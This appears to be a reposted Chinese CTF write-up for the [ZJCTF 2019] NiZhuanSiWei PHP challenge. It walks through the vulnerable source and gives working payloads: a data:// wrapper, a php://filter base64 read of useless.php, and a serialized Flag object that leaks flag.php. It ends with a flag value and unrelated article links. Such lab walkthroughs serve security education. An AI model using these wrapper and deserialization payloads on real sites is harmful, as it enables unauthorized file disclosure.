当前位置：首页 > news >正文

详解[ZJCTF 2019]NiZhuanSiWei 1（PHP两种伪协议、PHP反序列化漏洞、PHP强比较）还有那道题有这么经典？

news 文章来源：https://blog.csdn.net/m0_73734159/article/details/134408344 2025/5/19 12:04:59

题目环境：

<?php  $text = $_GET["text"];
$file = $_GET["file"];
$password = $_GET["password"];
if(isset($text)&&(file_get_contents($text,'r')==="welcome to the zjctf")){echo "<br><h1>".file_get_contents($text,'r')."</h1></br>";if(preg_match("/flag/",$file)){echo "Not now!";exit(); }else{include($file);  //useless.php$password = unserialize($password);echo $password;}
}
else{highlight_file(__FILE__);
}
?>

PHP代码审计

三个通过GET方式传参的参数text、file、password
file_get_contents() 函数把整个文件读入一个字符串中。
'r’代表读取内容
&&左右两边条件都要满足，===PHP强比较，类型和值都要相等
满足第一个参数就会输出这段字符串
从这里可以看出，需要用到PHP伪协议中的data协议
第二个参数file就是遇到的就是**正则匹配，**flag关键字被过滤了
当出现flag关键字时，程序就会自动退出，不再进行
反之，如果绕过正则的话，就包含咱们传给file参数的文件
可以看出作者注释里面给的有一个文件，useless.php
下面是对password参数进行反序列化
从这里可以猜出，useless.php文件可能包含的是反序列化内容
然后file参数和password参数联系起来就一目了然了（这里正则并没有用可以直接绕过）
猜测啊，file=useless.php，才能进入password参数那部分（后面可以给大家测试看看）

作者很贴心，打开题目给的有题目源码

当然咱们还可以通过data伪协议和php://filter伪协议去查看useless.php的源码

php://filter伪协议详解文末会给链接
base64编解码文末也会给链接

data协议规则：
data://text/plain;编码格式,读取内容
（注意一个是分号;命令拼接，和一个逗号,用来读取文本内容）

如果要读取后边的文件内容，字符串也要进行相应的编码
这里猜测useless.php文件是base64编码格式
所以使用base64编码格式

构造payload：
?text=data://text/plain;base64,d2VsY29tZSB0byB0aGUgempjdGY=&file=php://filter/read=convert.base64-encode/resource=useless.php

送去base64解码

useless.php源代码

<?php  class Flag{  //flag.php  public $file;  public function __tostring(){  if(isset($this->file)){  echo file_get_contents($this->file); echo "<br>";return ("U R SO CLOSE !///COME ON PLZ");}  }  
}  
?>

较为简单的序列化，直接给参数file赋值flag.php即可

进行序列化

<?php  class Flag{  //flag.php  public $file='flag.php';  public function __tostring(){  if(isset($this->file)){  echo file_get_contents($this->file); echo "<br>";return ("U R SO CLOSE !///COME ON PLZ");}  }  
} 
$flag=new Flag();
echo serialize($flag);
?>

构造最终payload：
?text=data://text/plain,welcome to the zjctf&file=useless.php&password=O:4:"Flag":1:{s:4:"file";s:8:"flag.php";}
上传payload：

这里表明三个参数都已符合了条件

F12查看源码：

得到flag：
flag{8fa13eb3-db41-4230-be27-634236f2fe1b}

这里再说明以下，为什么给file参数赋值useless.php，因为你进入了useless.php才能进入password参数那一步！
同时也绕过了正则

我们可以测试一下给file参数传inde.php文件会怎样
payload：
?text=data://text/plain,welcome to the zjctf&file=index.php

?text=data://text/plain,welcome to the zjctf&file=index.php&password=O:4:"Flag":1:{s:4:"file";s:8:"flag.php";}

可以看出，当参数file赋值为index.php文件的时候，一直执行的是index代码内容
那么当参数file赋值为useless.php文件的时候，才会去执行参数password的内容

php://filter伪协议可参考：https://blog.csdn.net/m0_73734159/article/details/130383801?spm=1001.2014.3001.5501
PHP序列化魔法函数可参考：https://blog.csdn.net/m0_73734159/article/details/133854073?spm=1001.2014.3001.5502
PHP强比较可参考：https://blog.csdn.net/m0_73734159/article/details/134349129?spm=1001.2014.3001.5501
base64编码解码网站：https://c.runoob.com/front-end/693/
【Kali终端也可通过命令进行base64解码】（echo “bae64编码内容” | base64 -d）

详解[ZJCTF 2019]NiZhuanSiWei 1（PHP两种伪协议、PHP反序列化漏洞、PHP强比较）还有那道题有这么经典？

相关文章：

详解[ZJCTF 2019]NiZhuanSiWei 1（PHP两种伪协议、PHP反序列化漏洞、PHP强比较）还有那道题有这么经典？

bazel build使用【未完】

11-13 /11-14代理模式 AOP

Ubuntu 创建并发布 Django 项目

SQL Server进阶知识

TFHEpp 使用记录

大模型的实践应用6-百度文心一言的基础模型ERNIE的详细介绍，与BERT模型的比较说明

vue：如何把后端传过来的数组的其中一个对象加入新的属性

数据库数据恢复—MSSQL报错“附加数据库错误823”如何恢复数据？

如何使用 Java 设计一个简单的成绩计算程序

requests 在 Python 3.2 中使用 OAuth 导入失败的问题与解决方案

山东省技能兴鲁网络安全大赛 web方向

No206.精选前端面试题，享受每天的挑战和学习

C#，数值计算——函数计算，Ratfn的计算方法与源程序

排序算法之-快速

[vim]Python编写插件学习笔记2 - 分离

【已解决】ModuleNotFoundError: No module named ‘kornia‘

预览PDF并显示当前页数

阿里云优惠券介绍、作用、领取入口及使用教程

Shell编程--流程控制

设计模式-模板方法模式（Template Method）

远程登录Linux方法(Linux平台相互远程；Windows远程登录Linux、远程编码、文件传输；无法远程登录的问题解决；c程序的编译)

macOS 13.6 及后续系统安装 Asahi Linux 将破坏引导

Python武器库开发-flask篇之flask框架的安装(二十一)

【CASS精品教程】打开cass提示base.dcl未找到文件的解决办法

[vim]Python编写插件学习笔记3 - 命令行参数

【仙逆】王林400年晋升元婴，复仇藤化元杀尽藤姓，高老畏罪自裁

云原生实战课大纲

数据湖架构

Zabbix 5.0部署（centos7+server+MySQL+Apache）